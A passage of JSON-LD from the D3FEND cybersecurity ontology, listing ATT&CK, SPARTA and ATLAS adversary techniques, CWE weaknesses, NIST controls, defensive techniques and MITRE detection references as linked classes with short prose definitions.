        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002423"
    },
    {
      "@id": "d3f:T1422.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422.002",
      "d3f:definition": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and future campaigns.",
      "rdfs:label": "Wi-Fi Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1422"
      },
      "skos:prefLabel": "Wi-Fi Discovery"
    },
    {
      "@id": "d3f:CWE-43",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-43",
      "d3f:definition": "The product accepts path input in the form of multiple trailing dots ('filedir....') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename....' (Multiple Trailing Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-163"
        },
        {
          "@id": "d3f:CWE-42"
        }
      ]
    },
    {
      "@id": "d3f:CanopyClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CC",
      "d3f:definition": "The canopy clustering algorithm is an unsupervised pre-clustering algorithm often used as a preprocessing step for the K-means algorithm or the Hierarchical clustering algorithm. It is intended to speed up clustering operations on large data sets.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Canopy clustering algorithm. [Link](https://en.wikipedia.org/wiki/Canopy_clustering_algorithm)",
      "rdfs:label": "Canopy Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:PER-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0003",
      "d3f:definition": "The adversary maintains long-lived access by residing within mission ground infrastructure that already has end-to-end reach to the spacecraft. Persistence can exist in operator workstations and mission control software, schedulers/orchestrators, station control (antenna/mount, modem/baseband), automation scripts and procedure libraries, identity and ticketing systems, and cloud-hosted mission services. With this foothold, the actor can repeatedly queue commands, updates, or file transfers during routine passes; mirror legitimate operator behavior to blend in; and refresh their tooling as software is upgraded. Presence on the ground also supports durable reconnaissance (pass plans, dictionaries, key/counter states) and continuous staging so each window to the vehicle can be exploited without re-establishing access.",
      "rdfs:label": "Ground System Presence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAPersistenceTechnique"
      },
      "skos:prefLabel": "Ground System Presence"
    },
    {
      "@id": "d3f:CWE-667",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-667",
      "d3f:definition": "The product does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.",
      "rdfs:label": "Improper Locking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:DHCPDiscoverEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client broadcasts a DISCOVER message to identify available DHCP servers capable of providing IP configuration.",
      "rdfs:label": "DHCP Discover Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DHCPEvent"
      },
      "skos:altLabel": "DHCPDISCOVER"
    },
    {
      "@id": "d3f:WindowsRegistryValueUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating changes to the data or configuration of an existing registry value within the Windows Registry.",
      "rdfs:label": "Windows Registry Value Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:Ne4f1957bbd8d44e89ff2521a748b7c5b"
        }
      ]
    },
    {
      "@id": "_:Ne4f1957bbd8d44e89ff2521a748b7c5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:M1038",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        }
      ],
      "rdfs:label": "Execution Prevention"
    },
    {
      "@id": "d3f:T1024",
      "@type": "owl:Class",
      "d3f:attack-id": "T1024",
      "d3f:definition": "Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Custom Cryptographic Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:Reference-RFC8471TheTokenBindingProtocolVersion1.0",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc8471"
      },
      "d3f:kb-abstract": "This document specifies version 1.0 of the Token Binding protocol. The Token Binding protocol allows client/server applications to create long-lived, uniquely identifiable TLS bindings spanning  multiple TLS sessions and connections. Applications are then enabled to cryptographically bind security tokens to the TLS layer, preventing token export and replay attacks.  To protect privacy, the Token Binding identifiers are only conveyed over TLS and can be reset by the user at any time.",
      "d3f:kb-author": "A. Popov, M. Nystroem, Microsoft Corp., D. Balfanz, Google Inc., J Hodges, Kings Mountain Systems",
      "d3f:kb-organization": "IETF",
      "d3f:kb-reference-of": {
        "@id": "d3f:TokenBinding"
      },
      "d3f:kb-reference-title": "RFC8471: The Token Binding Protocol Version 1.0",
      "rdfs:label": "Reference - The Token Binding Protocol Version 1.0"
    },
    {
      "@id": "d3f:T1597",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597",
      "d3f:definition": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)",
      "rdfs:label": "Search Closed Sources",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:T1567.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567.001",
      "d3f:definition": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is often over HTTPS, which gives the adversary an additional level of protection.",
      "d3f:may-produce": [
        {
          "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic"
        },
        {
          "@id": "d3f:OutboundInternetEncryptedWebTraffic"
        }
      ],
      "rdfs:label": "Exfiltration to Code Repository",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1567"
        },
        {
          "@id": "_:N749cee0955f14203b60afa53697b3449"
        },
        {
          "@id": "_:Nf7f41a3d7c644a4194bafb195d253768"
        }
      ]
    },
    {
      "@id": "_:N749cee0955f14203b60afa53697b3449",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic"
      }
    },
    {
      "@id": "_:Nf7f41a3d7c644a4194bafb195d253768",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-453",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-453",
      "d3f:definition": "The product, by default, initializes an internal variable with an insecure or less secure value than is possible.",
      "rdfs:label": "Insecure Default Variable Initialization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1188"
      }
    },
    {
      "@id": "d3f:First-stageBootLoader",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The very first routine run in order to load the operating system.",
      "rdfs:label": "First-stage Boot Loader",
      "rdfs:subClassOf": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEINTERRUPT",
      "@type": "owl:Class",
      "d3f:definition": "Stops a tracee.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_INTERRUPT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:CWE-138",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-138",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:ST0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to execute malicious code on the spacecraft.",
      "d3f:display-order": 4,
      "rdfs:label": "Execution - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-24",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Control Decisions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-24"
    },
    {
      "@id": "d3f:OTScanTime",
      "@type": "owl:Class",
      "d3f:definition": "An OT controller system variable that tracks the measured time it takes to read input status, apply logic, and write output values.",
      "rdfs:label": "OT Scan Time",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationScanTime"
      }
    },
    {
      "@id": "d3f:PER-0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "PER-0001",
      "d3f:definition": "The adversary arranges for malicious content to survive resets and mode changes by targeting memories and execution paths that initialize the system. Candidates include boot ROM handoff vectors, first/second-stage loaders, non-volatile images (flash/EEPROM), “golden” fallback partitions, configuration words/fuses, and RAM regions reconstructed at start-up from stored files or tables. Persistence may also ride auto-run mechanisms, init scripts, procedure engines, stored command sequences, or event hooks that execute on boot, safe-mode entry/exit, time triggers, or receipt of specific telemetry/commands. Variants keep the core payload only in RAM but ensure it is reloaded after every restart by patching copy-on-boot routines, altering file catalogs, or modifying table loaders so the same bytes are restored. The common thread is control of where the spacecraft looks for what to run next, so unauthorized logic is reinstated whenever the system resets or transitions modes.",
      "d3f:modifies": {
        "@id": "d3f:PrimaryStorage"
      },
      "rdfs:label": "Memory Compromise - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0001/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:Ndf1411b6068a43bd80684836ef6f60df"
        }
      ],
      "skos:prefLabel": "Memory Compromise"
    },
    {
      "@id": "_:Ndf1411b6068a43bd80684836ef6f60df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:RestorationEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event representing actions to return a compromised system or resource to a trusted operational state, such as through backup restoration, system reinstallation, or repair.",
      "d3f:related": {
        "@id": "d3f:Restore"
      },
      "rdfs:label": "Restoration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:ImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.",
      "d3f:enables": {
        "@id": "d3f:TA0040"
      },
      "rdfs:label": "Impact Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:Nc3d21bf5ca00420e976d0be76e50e822"
        }
      ]
    },
    {
      "@id": "_:Nc3d21bf5ca00420e976d0be76e50e822",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0040"
      }
    },
    {
      "@id": "d3f:CWE-638",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-638",
      "d3f:definition": "The product does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity's rights or privileges change over time.",
      "rdfs:label": "Not Using Complete Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-862"
        }
      ]
    },
    {
      "@id": "d3f:CWE-377",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-377",
      "d3f:definition": "Creating and using insecure temporary files can leave application and system data vulnerable to attack.",
      "rdfs:label": "Insecure Temporary File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:TraceThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Trace Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:T1553.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.003",
      "d3f:definition": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "SIP and Trust Provider Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
          "@id": "_:Ne1e6d2668d4449028f104f7b06002c9c"
        }
      ]
    },
    {
      "@id": "_:Ne1e6d2668d4449028f104f7b06002c9c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:EX-0009.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0009.01",
      "d3f:definition": "Flight software presents rich attack surface where mission-specific parsing and autonomy live. Vulnerable components include command and telemetry handlers, table loaders, file transfer services, mode management and safing logic, payload control applications, and gateway processes that bridge payload and bus protocols. Typical flaws are unchecked lengths and indices in command fields, arithmetic overflows in rate/size calculations, insufficient validation of table contents, format-string misuse in logging, incomplete state cleanup across rapid mode changes, and race conditions in concurrent message processing. Some FSW suites expose operator-facing APIs or scripting/procedure engines used for automation; malformed invocations can coerce unexpected behaviors or enable arbitrary expressions. Because many subsystems act on “last write wins,” logic errors can yield durable configuration changes without obvious anomalies in protocol syntax. Successful exploitation lets an adversary execute code, alter persistent parameters, or chain effects across partitions that would otherwise be segmented by design.",
      "d3f:modifies": {
        "@id": "d3f:Application"
      },
      "rdfs:label": "Flight Software - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0009"
        },
        {
          "@id": "_:N8bc63f57ca2d477cbc234773ea4ad521"
        }
      ],
      "skos:prefLabel": "Flight Software"
    },
    {
      "@id": "_:N8bc63f57ca2d477cbc234773ea4ad521",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:ApplicationLayerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event occurring at the application layer, involving protocols that support application-specific communication.",
      "rdfs:label": "Application Layer Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Mandatory Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(3)"
    },
    {
      "@id": "d3f:MailService",
      "@type": "owl:Class",
      "d3f:definition": "A mail service provides the ability to send and receive mail across a computer network.  The mail service runs on message transfer agents (i.e., mail servers) and is accessed by users through an email client.",
      "rdfs:label": "Mail Service",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Email"
        },
        {
          "@id": "dbr:Message_transfer_agent"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      },
      "skos:altLabel": "Email Service"
    },
    {
      "@id": "d3f:MemoryManagementUnitComponent",
      "@type": "owl:Class",
      "d3f:definition": "A Memory Management Unit Component is a hardware or software element that contributes to the functionality of a Memory Management Unit, which is responsible for managing and translating memory addresses in a computing system.",
      "rdfs:label": "Memory Management Unit Component",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Reference-RemoteDesktopLogon_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-005/"
      },
      "d3f:kb-abstract": "A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "CAR-2016-04-005: Remote Desktop Logon",
      "rdfs:label": "Reference - CAR-2016-04-005: Remote Desktop Logon - MITRE"
    },
    {
      "@id": "d3f:DS0036",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights",
      "d3f:exactly": {
        "@id": "d3f:UserGroup"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Group Metadata component",
      "rdfs:label": "Group (ATT&CK DS)"
    },
    {
      "@id": "d3f:evicts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evicts y: The entity x forcibly removes entity y from the environment or resource where y was residing.",
      "rdfs:label": "evicts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        },
        {
          "@id": "d3f:may-evict"
        }
      ]
    },
    {
      "@id": "d3f:preceded-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x preceded-by y: The event or action x occurs after event or action y in time.",
      "owl:inverseOf": {
        "@id": "d3f:precedes"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/BFO_0000062"
      },
      "rdfs:label": "preceded-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-103",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-103",
      "d3f:definition": "The product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().",
      "rdfs:label": "Struts: Incomplete validate() Method Definition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:AML.T0021",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0021",
      "d3f:definition": "Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [AI Attack Staging](/tactics/AML.TA0001), or for victim impersonation.",
      "rdfs:label": "Establish Accounts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0021"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Establish Accounts"
    },
    {
      "@id": "d3f:T1547.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.014",
      "d3f:definition": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "rdfs:label": "Active Setup",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:T1547.015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.015",
      "d3f:definition": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.",
      "d3f:modifies": {
        "@id": "d3f:UserLogonInitResource"
      },
      "rdfs:label": "Login Items",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N1a94e0bd98e14a6682483bd4292b6bac"
        }
      ]
    },
    {
      "@id": "_:N1a94e0bd98e14a6682483bd4292b6bac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserLogonInitResource"
      }
    },
    {
      "@id": "d3f:NetworkTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficAnalysis"
      ],
      "d3f:d3fend-id": "D3-NTA",
      "d3f:definition": "Analyzing intercepted or summarized computer network traffic to detect unauthorized activity.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Network Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4f1605814933459991e90c9f9f591aad"
        }
      ]
    },
    {
      "@id": "_:N4f1605814933459991e90c9f9f591aad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:SoftwareLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:SoftwareLibraryFile"
      },
      "d3f:definition": "A software library is a collection of software components that are used to build a software product.",
      "rdfs:label": "Software Library",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Library_(computing)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N5f9e2d601d6944ecb502aa8637651813"
        }
      ]
    },
    {
      "@id": "_:N5f9e2d601d6944ecb502aa8637651813",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareLibraryFile"
      }
    },
    {
      "@id": "d3f:BashScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Bash Script File"
    },
    {
      "@id": "d3f:EmailRule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A configuration of an email application which is used to apply logical or data processing functions to data processed by the email  application.",
      "rdfs:label": "Email Rule",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationRule"
      }
    },
    {
      "@id": "d3f:OTReadDeviceConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read device configuration.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl",
        "GE-SRTP: READ PROGRAM MEMORY"
      ],
      "rdfs:label": "OT Read Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-473",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-473",
      "d3f:definition": "A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise.",
      "rdfs:label": "PHP External Variable Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-471"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-003%3AClearingWindowsLogsWithWevtutil_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-003/"
      },
      "d3f:kb-abstract": "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-003: Clearing Windows Logs with Wevtutil",
      "rdfs:label": "Reference - CAR-2021-01-003: Clearing Windows Logs with Wevtutil - MITRE"
    },
    {
      "@id": "d3f:TargetAudience",
      "@type": "owl:Class",
      "rdfs:label": "Target Audience",
      "rdfs:subClassOf": {
        "@id": "d3f:AgentGroup"
      }
    },
    {
      "@id": "d3f:CWE-1121",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1121",
      "d3f:definition": "The code contains McCabe cyclomatic complexity that exceeds a desirable maximum.",
      "rdfs:label": "Excessive McCabe Cyclomatic Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:IOModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An I/O Module is a hardware device that translates signals between external sensors or actuators and control systems. It typically handles analog-to-digital (and vice versa) conversion, serving as the data interface that allows physical processes to be monitored and controlled by digital controllers.",
      "rdfs:label": "I/O Module",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaServices_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-005/"
      },
      "d3f:kb-abstract": "There are several ways to cause code to execute on a remote host. One of the most common methods is via the Windows Service Control Manager (SCM), which allows authorized users to remotely create and modify services. Several tools, such as PsExec, use this functionality.\n\nWhen a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the RPC Endpoint Mapper over 135/tcp. This handles authentication, and tells the client what port the endpoint--in this case the SCM--is listening on. Then, the client connects directly to the listening port on services.exe. If the request is to start an existing service with a known command line, the the SCM process will run the corresponding command.\n\nThis compound behavior can be detected by looking for services.exe receiving a network connection and immediately spawning a child process.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-03-005: Remotely Launched Executables via Services",
      "rdfs:label": "Reference - CAR-2014-03-005: Remotely Launched Executables via Services - MITRE"
    },
    {
      "@id": "d3f:Reference-DomainAgeRegistrationAlert_IncRapid7IncRAPID7Inc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170026400A1/"
      },
      "d3f:kb-abstract": "Systems and methods of identifying a security risk by monitoring and generating alerts based on attempts to access web domains that have been registered within a short period of time and are therefore identified as \"high-risk,\" including identifying an attempt to access a domain; receiving a registration date of the domain; and detecting a security risk based on the registration date of the domain.",
      "d3f:kb-author": "Samuel Adams; H D. Moore",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Rapid7 Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
